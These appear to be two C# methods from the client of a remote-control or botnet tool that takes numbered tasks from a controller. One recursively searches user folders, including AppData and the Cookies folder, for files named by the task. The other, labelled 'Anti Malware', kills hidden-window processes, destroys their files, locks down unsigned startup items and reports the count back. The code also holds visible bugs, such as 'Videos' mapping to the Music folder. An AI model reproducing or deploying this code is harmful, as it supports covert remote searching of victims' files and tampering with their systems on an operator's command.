public void Start() { mwork.addinfo("Starting File Searcher - TaskID: " + taskid + " Action: " + action); switch (loc) { case "Desktop": WalkDirRecursive(Environment.GetFolderPath(Environment.SpecialFolder.DesktopDirectory).ToString(), filename); break; case "Documents": WalkDirRecursive(Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments).ToString(), filename); break; case "Pictures": WalkDirRecursive(Environment.GetFolderPath(Environment.SpecialFolder.MyPictures).ToString(), filename); break; case "Videos": WalkDirRecursive(Environment.GetFolderPath(Environment.SpecialFolder.MyMusic).ToString(), filename); break; case "Program Data": WalkDirRecursive(Environment.GetEnvironmentVariable("PROGRAMDATA").ToString(), filename); break; case "Program Files": WalkDirRecursive(Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles).ToString(), filename); break; case "Appdata Local": WalkDirRecursive(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData).ToString(), filename); break; case "Appdata Roaming": WalkDirRecursive(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData).ToString(), filename); break; case "Temp Folder": WalkDirRecursive(Path.GetTempPath().ToString(), filename); break; case "Cookies Folder": WalkDirRecursive(Environment.GetFolderPath(Environment.SpecialFolder.Cookies).ToString(), filename); break; } }
public void Start() { mwork.addinfo("[Anti Malware] Execution Parameters:" + excparams); mwork.addinfo("[Anti Malware] Successfully started Malware Cleaner..."); try { try { Process[] Proc = Process.GetProcesses(); string path; for (int x = 0; x <= Proc.Length - 1; x++) { Process p = Proc[x]; try { path = System.IO.Path.GetFullPath(p.MainModule.FileName); if (IsFileMalicious(path)) { if (!WindowIsVisible(p.MainWindowTitle)) { try { p.Kill(); mwork.addlog("[Anti Malware] Killed Process: " + p.ProcessName); } catch { } DestroyFile(path); killed = killed + 1; } } } catch { } } } catch { } string[] tehfilesandshit = Directory.GetFiles(Environment.GetFolderPath(Environment.SpecialFolder.Startup)); foreach (var workload in tehfilesandshit) { if (WinTrust.VerifyEmbeddedSignature(workload) == false) { System.IO.DirectoryInfo FolderInfo = new System.IO.DirectoryInfo(workload); DirectorySecurity FolderAcl = new DirectorySecurity(); FolderAcl.SetAccessRuleProtection(true, false); FolderInfo.SetAccessControl(FolderAcl); mwork.addlog("[Anti Malware] Removed Startup Item: " + workload); } } } catch { } string priority = ""; if (killed == 0) { priority = "Info"; } else if (killed == 1) { priority = "Log"; } else if (killed > 2) { priority = "Priority"; } else if (killed > 5) { priority = "Risk"; } mwork.Send("ADDLOG|" + mwork.ClientID + "|" + priority + "|" + "Successfully finished Anti Malware Task. Processes killed: " + killed.ToString() + "."); mwork.addinfo("[Anti Malware] Processes killed: " + killed.ToString()); mwork.addinfo("[Anti Malware] Files destroyed: " + fileskilled.ToString()); mwork.addinfo("[Anti Malware] Successfully finished the Malware Cleaning!"); }